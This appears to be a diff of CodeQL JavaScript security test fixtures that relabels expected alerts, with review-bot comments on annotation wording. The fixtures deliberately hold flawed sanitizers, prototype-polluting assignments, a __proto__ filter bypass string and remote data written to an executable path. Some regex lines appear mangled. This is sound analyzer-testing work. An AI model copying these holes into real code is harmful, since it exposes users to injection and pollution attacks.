@@ -28,8 +28,8 @@ var strip = ']*)>([\\S\\s]*?)<\/script([^>]*)>'; // OK - it's used w new RegExp(strip, 'gi'); var moreFilters = [ - /-->/g, // NOT OK - doesn't match --!> - /^>|^->||--!>|/g, // $ Alert - doesn't match --!> + /^>|^->||--!>|\x20\t\r\n\f]*)[^>]*)\/>/gi, expanded - ); // NOT OK - html.replace(/<(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi, expanded); // NOT OK + ); // $ Alert + html.replace(/<(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi, expanded); // $ Alert // lib2 html.replace( /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi, expanded - ); // NOT OK - html.replace(/<(([\w:]+)[^>]*)\/>/gi, expanded); // NOT OK + ); // $ Alert + html.replace(/<(([\w:]+)[^>]*)\/>/gi, expanded); // $ Alert // lib3 html.replace( /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:-]+)[^>]*)\/>/gi, expanded - ); // NOT OK - html.replace(/<(([\w:-]+)[^>]*)\/>/gi, expanded); // NOT OK + ); // $ Alert + html.replace(/<(([\w:-]+)[^>]*)\/>/gi, expanded); // $ Alert - html.replace(defaultPattern, expanded); // NOT OK + html.replace(defaultPattern, expanded); // $ Alert function getPattern() { return defaultPattern; } - html.replace(getPattern(), expanded); // NOT OK + html.replace(getPattern(), expanded); // $ Alert function getExpanded() { return expanded; } - html.replace(defaultPattern, getExpanded()); // NOT OK (but not tracking the expansion string) - html.replace(defaultPattern, something); // OK (possibly) - defaultPattern.match(something); // OK (possibly) - getPattern().match(something); // OK (possibly) + html.replace(defaultPattern, getExpanded()); // MISSING: Alert - not tracking the expansion string + html.replace(defaultPattern, something); // OK - possibly + defaultPattern.match(something); // OK - possibly + getPattern().match(something); // OK - possibly }); 
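Review bot: `html.replace(defaultPattern, getExpanded()); // MISSING: Alert - not tracking the expansion string` has no `$` after the `//`, unlike the other expectations in the patch. If it is meant to record a known false negative in a machine-checked way, it needs to be `// $ MISSING: Alert - not tracking the expansion string`. As written it is probably read as an ordinary comment, so the test does not track the gap in coverage. The header of this hunk is not legible on the page, so the file it belongs to should be checked before applying this.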
diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js index 2c31e247bf22..680535452194 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js @@ -1,14 +1,14 @@ // CVE-2019-10756 (function(content) { - content = content.replace(/<.*cript.*\/scrip.*>/gi, ""); // NOT OK - content = content.replace(/ on\w+=".*"/g, ""); // NOT OK - content = content.replace(/ on\w+=\'.*\'/g, ""); // NOT OK + content = content.replace(/<.*cript.*\/scrip.*>/gi, ""); // $ Alert + content = content.replace(/ on\w+=".*"/g, ""); // $ Alert + content = content.replace(/ on\w+=\'.*\'/g, ""); // $ Alert return content; }); (function(content) { - content = content.replace(/<.*cript.*/gi, ""); // NOT OK - content = content.replace(/.on\w+=.*".*"/g, ""); // NOT OK - content = content.replace(/.on\w+=.*\'.*\'/g, ""); // NOT OK + content = content.replace(/<.*cript.*/gi, ""); // $ Alert + content = content.replace(/.on\w+=.*".*"/g, ""); // $ Alert + content = content.replace(/.on\w+=.*\'.*\'/g, ""); // $ Alert return content; }); 
@@ -16,18 +16,18 @@ // CVE-2020-7656 (function(responseText) { var rscript = /)<[^<]*)*<\/script>/gi; - responseText.replace(rscript, ""); // NOT OK + responseText.replace(rscript, ""); // $ Alert return responseText; }); // CVE-2019-1010091 (function(text) { - text = text.replace(//gm, ""); // NOT OK - x = x.replace(/\sng-[a-z-]+/, ""); // NOT OK - x = x.replace(/\sng-[a-z-]+/g, ""); // NOT OK (ng-attributes) + x = x.replace(//gm, ""); // $ Alert + x = x.replace(/\sng-[a-z-]+/, ""); // $ Alert + x = x.replace(/\sng-[a-z-]+/g, ""); // $ Alert - ng-attributes - x = x.replace(/()/g, "\n"); // OK: not a sanitizer + x = x.replace(/()/g, "\n"); // OK - not a sanitizer - x = x.replace(//g, ""); // OK [INCONSISTENCY] - x = x.replace(/> - > - - + > + > + > + + - - - + + + - + - - + \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js index bca6567b4f5e..324197179d2f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js @@ -17,7 +17,7 @@ rootRoute.post(function(req, res) { function problem(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert ret.push(val[i]); } } @@ -26,7 +26,7 @@ function whileLoop(val) { var ret = []; var i = 0; - while (i < val.length) { // NOT OK! + while (i < val.length) { // $ Alert ret.push(val[i]); i++; } @@ -35,7 +35,7 @@ function whileLoop(val) { function useLengthIndirectly(val) { var ret = []; - var len = val.length; // NOT OK! + var len = val.length; // $ Alert for (var i = 0; i < len; i++) { ret.push(val[i]); 
@@ -48,7 +48,7 @@ function noNullPointer(val) { const c = 0; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert // Constantly accessing element 0, therefore not guaranteed null-pointer. ret.push(val[c].foo); diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js index 3193a384aca2..923416c35b8e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js @@ -17,7 +17,7 @@ rootRoute.post(function (req, res) { function breaks(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert for (var k = 0; k < 2; k++) { if (k == 3) { // Does not prevent DoS, because this is inside an inner loop. @@ -31,7 +31,7 @@ function breaks(val) { function throws(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert if (val[i] == null) { try { throw 2; // Is caught, and therefore the DoS is not prevented. @@ -46,7 +46,7 @@ function throws(val) { function returns(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert if (val[i] == null) { (function (i) { return i+2; // Does not prevent DoS. @@ -57,7 +57,7 @@ function returns(val) { } function lodashThrow(val) { - _.map(val, function (e) { // NOT OK! + _.map(val, function (e) { // $ Alert if (!e) { try { throw new Error(); // Does not prevent DoS. diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js index 705ec6b5b0ea..71586956dad2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js @@ -17,7 +17,7 @@ rootRoute.post(function (req, res) { function breaks(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { break; // Prevents DoS. } @@ -28,7 +28,7 @@ function breaks(val) { function throws(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { throw 2; // Prevents DoS. } @@ -40,7 +40,7 @@ function throws(val) { function returns(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { return 2; // Prevents DoS. } @@ -49,7 +49,7 @@ function returns(val) { } function lodashThrow(val) { - _.map(val, function (e) { // OK + _.map(val, function (e) { if (!e) { throw new Error(); // Prevents DoS. } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js index 49c813834450..ddd0dcf3301d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js @@ -23,7 +23,7 @@ function sanitized(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -35,7 +35,7 @@ function sanitized2(val) { return []; } // Val can only be a primitive. Therefore no issue! - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } 
@@ -53,7 +53,7 @@ function sanitized3(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -67,7 +67,7 @@ function sanitized4(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js index 2f2fdb0d67a0..548d0fc944a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js @@ -10,5 +10,5 @@ rootRoute.post(function(req, res) { }); function problem(val) { - _.chunk(val, 2); // NOT OK! + _.chunk(val, 2); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js index 22649392557e..a9817883f082 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js @@ -16,7 +16,7 @@ function problem(val) { return []; } - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i]); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js index b8e4b1f50971..bd3aed633ff5 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js @@ -21,7 +21,7 @@ rootRoute.post(function(req, res) { function nullPointer(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i].foo + 42); } } @@ -30,7 +30,7 @@ function nullPointer(val) { function nullPointer2(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { var element = val[i]; ret.push(element.foo + 42); } @@ -38,7 +38,7 @@ function nullPointer2(val) { function nullPointer3(val) { let arr = val.messaging - for (let i = 0; i < arr.length; i++) { // OK + for (let i = 0; i < arr.length; i++) { let event = val.messaging[i] let sender = event.sender.id } @@ -46,13 +46,13 @@ function nullPointer3(val) { function lodashPointer(val) { - return _.map(val, function(e) { // OK + return _.map(val, function(e) { return e.foo; }) } function lodashArrowFunc(val) { - return _.map(val, (e) => { // OK + return _.map(val, (e) => { return e.foo; }); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js index bbbe3a9eb7ee..ac456fbdbd94 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js 
@@ -14,11 +14,11 @@ function nullPointer(val) { var ret = []; // Has obvious null-pointer. And guards the next loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i].foo); } - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i]); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-843/tst.js b/javascript/ql/test/query-tests/Security/CWE-843/tst.js index 3f5840b9f080..d859f2ade6e2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-843/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-843/tst.js 
@@ -3,59 +3,59 @@ var Koa = require('koa'); express().get('/some/path', function (req, res) { var foo = req.query.foo; - foo.indexOf(); // NOT OK + foo.indexOf(); // $ Alert - foo.concat(); // NOT OK + foo.concat(); // $ Alert function f() { - foo.concat(); // NOT OK + foo.concat(); // $ Alert } function g(bar) { - bar.concat(); // NOT OK + bar.concat(); // $ Alert } g(foo); - req.url.indexOf(); // OK + req.url.indexOf(); - foo.indexOf(prefix) === 0; // OK - foo.indexOf(prefix) == 0; // OK - foo.indexOf(prefix) !== 0; // OK + foo.indexOf(prefix) === 0; + foo.indexOf(prefix) == 0; + foo.indexOf(prefix) !== 0; - foo.slice(-1) === 'x'; // OK + foo.slice(-1) === 'x'; - foo.indexOf(prefix) == 1; // NOT OK - foo.slice(1) === 'x'; // NOT OK + foo.indexOf(prefix) == 1; // $ Alert + foo.slice(1) === 'x'; // $ Alert if (typeof foo === "string") { - foo.indexOf(); // OK + foo.indexOf(); } else { - foo.indexOf(); // OK + foo.indexOf(); } if (foo instanceof Array) { - foo.indexOf(); // OK, but still flagged [INCONSISTENCY] + foo.indexOf(); // $ SPURIOUS: Alert } - (foo + f()).indexOf(); // OK + (foo + f()).indexOf(); - foo.length; // NOT OK + foo.length; // $ Alert }); new Koa().use(function handler(ctx) { var foo = ctx.request.query.foo; - foo.indexOf(); // NOT OK + foo.indexOf(); // $ Alert }); express().get('/some/path/:foo', function (req, res) { var foo = req.params.foo; - foo.indexOf(); // OK + foo.indexOf(); }); express().get('/some/path/:foo', function (req, res) { - if (req.query.path.length) { } // OK - req.query.path.length == 0; // OK - !req.query.path.length; // OK - req.query.path.length > 0; // OK + if (req.query.path.length) { } + req.query.path.length == 0; + !req.query.path.length; + req.query.path.length > 0; }); express().get('/some/path/:foo', function (req, res) { 
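Review bot: The `$ SPURIOUS: Alert` on `foo.indexOf()` inside `if (foo instanceof Array)` (CWE-843/tst.js, hunk `@@ -3,59 +3,59 @@`) gives no reason for the unwanted alert, and the `[INCONSISTENCY]` tag it replaces gave none either. The `Array.isArray(data)` branch in the last hunk of this file carries no annotation, so the difference appears to be that an `instanceof Array` guard is not treated as a type check while `Array.isArray` is. I would record that on the line, e.g. `foo.indexOf(); // $ SPURIOUS: Alert - instanceof Array guard not recognised, unlike Array.isArray`, so readers know that code guarded this way is still reported.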
@@ -65,11 +65,11 @@ express().get('/some/path/:foo', function (req, res) { return; } - while (p.length) { // OK + while (p.length) { p = p.substr(1); } - p.length < 1; // OK + p.length < 1; }); express().get('/some/path/:foo', function (req, res) { @@ -78,8 +78,8 @@ express().get('/some/path/:foo', function (req, res) { }); function safeGet(obj, p) { - if (p === '__proto__' || // NOT OK - could be singleton array - p === 'constructor') { // NOT OK - could be singleton array + if (p === '__proto__' || // $ Alert - could be singleton array + p === 'constructor') { // $ Alert - could be singleton array return null; } return obj[p]; @@ -87,24 +87,24 @@ function safeGet(obj, p) { express().get('/foo', function (req, res) { let data = req.query; - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert if (typeof data.foo !== 'undefined') { - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert } if (typeof data.foo !== 'string') { - data.foo.indexOf(); // OK + data.foo.indexOf(); } if (typeof data.foo !== 'undefined') { - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert } }); express().get('/foo', function (req, res) { let data = req.query.data; - data.indexOf(); // NOT OK + data.indexOf(); // $ Alert if (Array.isArray(data)) { - data.indexOf(); // OK + data.indexOf(); } else { - data.indexOf(); // OK + data.indexOf(); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-912/tst.js b/javascript/ql/test/query-tests/Security/CWE-912/tst.js index 78acef7d3aad..88e7827a480c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-912/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-912/tst.js 
@@ -13,27 +13,27 @@ try { (response) => { response.setEncoding('utf8'); response.on('data', (c) => { - fs.writeFile("/tmp/test", c, (err) => {}); // BAD: data from response 'on' event flows to file + fs.writeFile("/tmp/test", c, (err) => {}); // $ Alert - data from response 'on' event flows to file let writeStream = fs.createWriteStream('/usr/evil/evil.cmd'); - writeStream.write(c); // BAD: data from response 'on' event flows to filestream write + writeStream.write(c); // $ Alert - data from response 'on' event flows to filestream write writeStream.end(); var stream = fs.createWriteStream("my_file.txt"); stream.once('open', function (fd) { - stream.write(c); // BAD: data from response 'on' event flows to filestream write + stream.write(c); // $ Alert - data from response 'on' event flows to filestream write stream.end(); }); }); response.on('error', () => { - fs.writeFile("/tmp/test", "error occured"); // GOOD: static data written to file + fs.writeFile("/tmp/test", "error occured"); // OK - static data written to file }); }).on('error', () => { let error = "error occured"; let writeStream = fs.createWriteStream('/usr/good/errorlog.txt'); - writeStream.write(error); // GOOD: static data written to file stream + writeStream.write(error); // OK - static data written to file stream writeStream.end(); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js index fb550533d124..6acf7ef2df10 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js @@ -3,7 +3,7 @@ module.exports.set = function recSet(obj, path, value) { var currentValue = obj[currentPath]; if (path.length === 1) { if (currentValue === void 0) { - obj[currentPath] = value; // NOT OK + obj[currentPath] = value; // $ Alert } return currentValue; } 
@@ -12,18 +12,18 @@ module.exports.set = function recSet(obj, path, value) { } module.exports.set2 = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs = function() { var obj = arguments[0]; var path = arguments[1]; var value = arguments[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } module.exports.usedInTest = function (obj, path, value) { - return obj[path[0]][path[1]] = value; // NOT OK + return obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs2 = function() { @@ -31,7 +31,7 @@ module.exports.setWithArgs2 = function() { var obj = args[0]; var path = args[1]; var value = args[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs3 = function() { @@ -39,7 +39,7 @@ module.exports.setWithArgs3 = function() { var obj = args[0]; var path = args[1]; var value = args[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } function id(s) { @@ -52,7 +52,7 @@ module.exports.notVulnerable = function () { const path = id("x"); const value = id("y"); const obj = id("z"); - return (obj[path[0]][path[1]] = value); // OK + return (obj[path[0]][path[1]] = value); } class Foo { @@ -67,12 +67,12 @@ class Foo { const obj = this.obj; const path = this.path; const value = this.value; - return (obj[path[0]][path[1]] = value); // NOT OK + return (obj[path[0]][path[1]] = value); // $ Alert } safe() { const obj = this.obj; - obj[path[0]] = this.value; // OK + obj[path[0]] = this.value; } } 
@@ -81,10 +81,10 @@ module.exports.Foo = Foo; module.exports.delete = function() { var obj = arguments[0]; var path = arguments[1]; - delete obj[path[0]]; // OK + delete obj[path[0]]; var prop = arguments[2]; var proto = obj[path[0]]; - delete proto[prop]; // NOT OK + delete proto[prop]; // $ Alert } module.exports.fixedProp = function (obj, path, value) { @@ -105,18 +105,18 @@ module.exports.sanWithFcuntion = function() { var two = arguments[2]; var value = arguments[3]; - obj[one][two] = value; // NOT OK + obj[one][two] = value; // $ Alert if (isPossibilityOfPrototypePollution(one) || isPossibilityOfPrototypePollution(two)) { throw new Error('Prototype pollution is not allowed'); } - obj[one][two] = value; // OK + obj[one][two] = value; } module.exports.returnsObj = function () { return { set: function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } } } @@ -125,7 +125,7 @@ class MyClass { constructor() {} set(obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } static staticSet(obj, path, value) { diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js index d74de12493aa..f8ed4b8235ab 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js @@ -1,3 +1,3 @@ module.exports.set = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js index 4d3e7a82f5c8..e15bbf81cddd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js @@ -3,7 +3,7 @@ Foobar.prototype = { method: function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert }, }; diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js index 66db628cfcc0..1a662007b49a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js @@ -1,5 +1,5 @@ module.exports.set = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } var other = require('./other') diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js index a622a8913905..770df9ab2cf1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js 
@@ -5,50 +5,50 @@ app.get('/', (req, res) => { let taint = String(req.query.data); let object = {}; - object[taint][taint] = taint; // NOT OK - object[taint].foo = 'bar'; // NOT OK - may pollute, although attacker has no control over data being injected - object.baz[taint] = taint; // OK + object[taint][taint] = taint; // $ Alert + object[taint].foo = 'bar'; // $ Alert - may pollute, although attacker has no control over data being injected + object.baz[taint] = taint; mutateObject(object[taint], 'blah'); - unsafeGetProp(object, taint).foo = 'bar'; // NOT OK - unsafeGetProp(object, 'safe').foo = 'bar'; // OK + unsafeGetProp(object, taint).foo = 'bar'; // $ Alert + unsafeGetProp(object, 'safe').foo = 'bar'; - safeGetProp(object, taint).foo = 'bar'; // OK + safeGetProp(object, taint).foo = 'bar'; let possiblyProto = object[taint] || new Box(); possiblyProto.m(); let prototypeLessObject = Object.create(null); - prototypeLessObject[taint][taint] = taint; // OK + prototypeLessObject[taint][taint] = taint; let directlyMutated = {}; directlyMutated[taint] = taint; // OK - can't affect Object.prototype if (object.hasOwnProperty(taint)) { - object[taint].foo = 'bar'; // OK + object[taint].foo = 'bar'; } }); function mutateObject(obj, x) { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert if (obj instanceof Object) { - obj.foo = x; // OK + obj.foo = x; } if (obj != null) { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj === 'function') { - obj.foo = x; // OK + obj.foo = x; } if (typeof obj !== 'function') { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj === 'object') { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj !== 'object') { - obj.foo = x; // OK + obj.foo = x; } } 
@@ -77,39 +77,39 @@ app.get('/', (req, res) => { let taint = String(req.query.data); let object = {}; - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert - object["" + taint]["" + taint] = taint; // NOT OK + object["" + taint]["" + taint] = taint; // $ Alert if (!taint.includes("__proto__")) { - object[taint][taint] = taint; // OK + object[taint][taint] = taint; } else { - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert } }); app.get('/foo', (req, res) => { let obj = {}; - obj[req.query.x.replace('_', '-')].x = 'foo'; // OK - obj[req.query.x.replace('_', '')].x = 'foo'; // NOT OK - obj[req.query.x.replace(/_/g, '')].x = 'foo'; // OK - obj[req.query.x.replace(/_/g, '-')].x = 'foo'; // OK - obj[req.query.x.replace(/__proto__/g, '')].x = 'foo'; // NOT OK - "__pr__proto__oto__" - obj[req.query.x.replace('o', '0')].x = 'foo'; // OK + obj[req.query.x.replace('_', '-')].x = 'foo'; + obj[req.query.x.replace('_', '')].x = 'foo'; // $ Alert + obj[req.query.x.replace(/_/g, '')].x = 'foo'; + obj[req.query.x.replace(/_/g, '-')].x = 'foo'; + obj[req.query.x.replace(/__proto__/g, '')].x = 'foo'; // $ Alert - "__pr__proto__oto__" + obj[req.query.x.replace('o', '0')].x = 'foo'; }); app.get('/bar', (req, res) => { let taint = String(req.query.data); let object = {}; - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert const bad = ["__proto__", "constructor"]; if (bad.includes(taint)) { return; } - object[taint][taint] = taint; // OK + object[taint][taint] = taint; }); app.get('/assign', (req, res) => { 
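Review bot: The `.replace` cases in the `/foo` handler (PrototypePollutingAssignment/tst.js, hunk `@@ -77,39 +77,39 @@`) differ only in small sanitizer details, and once the `// OK` markers are dropped only the `/__proto__/g` line still says why it is expected to alert. A short reason on the other alerting line would keep the fixture readable, for example `obj[req.query.x.replace('_', '')].x = 'foo'; // $ Alert - a string pattern replaces only the first '_'`. The same applies to the `new RegExp('_', '')` line in the following `@@ -126,7 +126,7 @@` hunk, where the absent `g` flag is presumably what separates it from its two unflagged neighbours; the `unknownFlags()` line could likewise say that unknown flags are deliberately not reported.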
@@ -126,7 +126,7 @@ app.get('/assign', (req, res) => { app.get('/foo', (req, res) => { let obj = {}; - obj[req.query.x.replace(new RegExp('_', 'g'), '')].x = 'foo'; // OK - obj[req.query.x.replace(new RegExp('_', ''), '')].x = 'foo'; // NOT OK - obj[req.query.x.replace(new RegExp('_', unknownFlags()), '')].x = 'foo'; // OK + obj[req.query.x.replace(new RegExp('_', 'g'), '')].x = 'foo'; + obj[req.query.x.replace(new RegExp('_', ''), '')].x = 'foo'; // $ Alert + obj[req.query.x.replace(new RegExp('_', unknownFlags()), '')].x = 'foo'; }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js index c7285a3ac1bd..c53d6f20aca1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js @@ -12,7 +12,7 @@ function assignToPath(target, path, value) { } target = target[key]; } else { - target[key] = value; // NOT OK + target[key] = value; // $ Alert } } } @@ -28,7 +28,7 @@ function assignToPathSafe(target, path, value) { } target = target[key]; } else { - target[key] = value; // OK + target[key] = value; } } } @@ -41,7 +41,7 @@ function assignToPathAfterLoop(target, path, value) { let key = keys[i]; target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } function splitHelper(path, sep) { @@ -58,7 +58,7 @@ function assignToPathWithHelper(target, path, value, sep) { let key = keys[i]; target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } function spltOnRegexp(target, path, value) { 
